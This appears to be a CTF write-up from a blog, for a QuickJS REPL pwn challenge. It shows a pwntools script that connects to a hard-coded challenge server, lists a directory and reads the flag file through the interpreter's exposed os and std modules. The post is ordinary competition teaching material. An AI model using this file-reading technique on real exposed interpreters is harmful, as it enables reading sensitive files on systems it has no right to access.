2022 强国杯 CTF: qjspwn1

PWN

qqjs_new

Approach: after fuzzing the prompt a little, I found that the `os` module is usable. Using `os` to look for the flag's location showed that it is at /home/ctf/flag.

Static analysis in IDA showed that a `std` object exists; typing `std` at the prompt listed a `loadFile` function, which can read the flag's contents.

In one sentence: fuzz the prompt until you find something that reads the file directly.

Exploit:

from pwn import *

p = remote("39.107.82.142", "52300")

# The challenge is a qjs REPL with the `os` and `std` modules already loaded.
# Typing `os` at the prompt dumps the module; the REPL printed the following:
p.sendlineafter("> ", 'os')
'''
{ O_APPEND: 1024, O_CREAT: 64, O_EXCL: 128, O_RDONLY: 0, O_RDWR: 2, O_TRUNC: 512, O_WRONLY: 1, SIGABRT: 6, SIGALRM: 14, SIGCHLD: 17, SIGCONT: 18, SIGFPE: 8, SIGILL: 4, SIGINT: 2, SIGPIPE: 13, SIGQUIT: 3, SIGSEGV: 11, SIGSTOP: 19, SIGTERM: 15, SIGTSTP: 20, SIGTTIN: 21, SIGTTOU: 22, SIGUSR1: 10, SIGUSR2: 12, S_IFBLK: 24576, S_IFCHR: 8192, S_IFDIR: 16384, S_IFIFO: 4096, S_IFLNK: 40960, S_IFMT: 61440, S_IFREG: 32768, S_IFSOCK: 49152, S_ISGID: 1024, S_ISUID: 2048, WNOHANG: 1, Worker: function Worker(), chdir: function chdir(), clearTimeout: function clearTimeout(), close: function close(), dup: function dup(), dup2: function dup2(), exec: function exec(), getcwd: function getcwd(), isatty: function isatty(), kill: function kill(), lstat: function lstat(), mkdir: function mkdir(), open: function open(), pipe: function pipe(), platform: "linux", read: function read(), readdir: function readdir(), readlink: function readlink(), realpath: function realpath(), remove: function remove(), rename: function rename(), seek: function seek(), setReadHandler: function setReadHandler(), setTimeout: function setTimeout(), setWriteHandler: function setWriteHandler(), signal: function signal(), sleep: function sleep(), stat: function stat(), symlink: function symlink(), ttyGetWinSize: function ttyGetWinSize(), ttySetRaw: function ttySetRaw(), utimes: function utimes(), waitpid: function waitpid(), write: function write() }
'''
# os.readdir lists the challenge directory and confirms the flag is at /home/ctf/flag
p.sendlineafter("> ", 'os.readdir("/home/ctf")')

# Dump `std` as well; it exposes loadFile, which reads a whole file into a string
p.sendlineafter("> ", 'std')
'''
{ Error: {  }, SEEK_CUR: 1, SEEK_END: 2, SEEK_SET: 0, err: {  }, evalScript: function evalScript(), exit: function exit(), fdopen: function fdopen(), gc: function gc(), getenv: function getenv(), getenviron: function getenviron(), in: {  }, loadFile: function loadFile(), loadScript: function loadScript(), open: function open(), out: {  }, parseExtJSON: function parseExtJSON(), popen: function popen(), printf: function printf(), puts: function puts(), setenv: function setenv(), sprintf: function sprintf(), strerror: function strerror(), tmpfile: function tmpfile(), unsetenv: function unsetenv(), urlGet: function urlGet() }
'''
# std.loadFile returns the flag contents, which the REPL echoes back
p.sendlineafter("> ", 'std.loadFile("/home/ctf/flag")')
p.interactive()

Link to this article:

http://blog.azly.top/index.php/archives/79/